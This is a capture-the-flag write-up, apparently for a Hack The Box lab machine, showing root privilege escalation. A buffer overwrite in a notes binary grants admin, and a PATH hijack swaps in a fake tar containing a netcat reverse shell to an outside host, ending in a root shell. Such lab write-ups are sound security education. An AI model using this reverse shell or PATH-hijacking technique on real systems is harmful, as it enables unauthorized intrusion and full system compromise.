Privilege Escalation
A SGID binary is confirmed to be vulnerable to data overwrite
As I was able to reproduce the overwrite above multiple times, this presents an opportunity to take control of the user attributes
Counting the result above, it seems that the Role attribute;
- is 15 characters (bytes) long
- gets overwritten if data written to the note feature (option 4) is more than 24 bytes.
With that in mind, I can forge a string to over write the Role attribute to admin
AAAAAAAAAAAAAAAABBBBBBBBadmin CCCCCCCCDDDDDDDDDDDDDDDD
This forged string above
- is 64 bytes in length
- has 24 bytes for buffer
- followed by the
adminstring with11whitespaces - the rest (24 bytes)
I will get to it right away.
tbuckley@gofer:~$ /usr/local/bin/notes
========================================
1) Create an user and choose an username
2) Show user information
3) Delete an user
4) Write a note
5) Show a note
6) Save a note (not yet implemented)
7) Delete a note
8) Backup notes
9) Quit
========================================
your choice: 1
choose an username: qwe
[...REDACTED...]
your choice: 2
username: qwe
role: user
[...REDACTED...]
your choice: 3
[...REDACTED...]
your choice: 2
username:
role: userI will first create an arbitrary user and delete it right after I can confirm that the Username attribute is gone
your choice: 4
write your note:
AAAAAAAAAAAAAAAABBBBBBBBadmin CCCCCCCCDDDDDDDDDDDDDDDDThen I can deliver the forged string to overwrite the Role attribute to admin
your choice: 2
username: AAAAAAAAAAAAAAAABBBBBBBBadmin
role: adminIt’s confirmed
Now, I that I have the admin status, I can access the option 8 to perform the backup operation
It appears that the backup operation is conducted with tar
I can also confirm the process with PSPY in the background
The backup operation is using tar to archive the /opt/notes directory to /root/backups/backuo_notes.tar.gz
tbuckley@gofer:/opt$ ll notes
total 8.0K
4.0k drwxr-xr-x 2 root root 4.0k apr 28 16:37 .
4.0k drwxr-xr-x 4 root root 4.0k apr 28 12:59 ..Although there is nothing in the /opt/notes directory and no relevant sensitive data is found to be present, there is something that is incredibly easy to miss
It’s right here.
The SGID program is calling tar with a relative path
This can be checked again by peeking into the program itself
The image above is partial output of $ strings /usr/local/bin/notes command
It calls tar WITHOUT the absolute path, leaving it vulnerable to the PATH Hijacking attack
Path Hijacking
Since the SGID binary calls tar WITHOUT the absolute path, I can just create a malicious tar and hijack the PATH variable of the current session.
tbuckley@gofer:~$ which nc
/usr/bin/ncFirst, I need to check the absolute path of Netcat
tbuckley@gofer:~$ echo '/usr/bin/nc 10.10.14.20 1234 -e /bin/bash' > tar I will then create arbitrary tar with a Netcat reverse shell command in it
tbuckley@gofer:~$ export PATH="/home/tbuckley:$PATH"
tbuckley@gofer:~$ echo $PATH
/home/tbuckley:/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/gamesHijacking the $PATH variable to set the home directory as the first priority Now invoking tar from the home directory would trigger the newly created malicious tar with an embedded Netcat reverse shell above It’s all set
Your choice: 8
Access granted!I already started the SGID binary from the home directory and went through the overwriting process again Now selecting the option 8 to invoke the malicious tar above
┌──(kali㉿kali)-[~/archive/htb/labs/gofer]
└─$ nnc 1234
listening on [any] 1234 ...
connect to [10.10.14.20] from (UNKNOWN) [10.10.11.225] 55920
whoami
root
hostname
gofer.htb
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 00:50:56:b9:0b:c9 brd ff:ff:ff:ff:ff:ff
altname enp3s0
altname ens160
inet 10.10.11.225/23 brd 10.10.11.255 scope global eth0
valid_lft forever preferred_lft foreverThe malicious tar is invoked and a shell session is opened System Level Compromised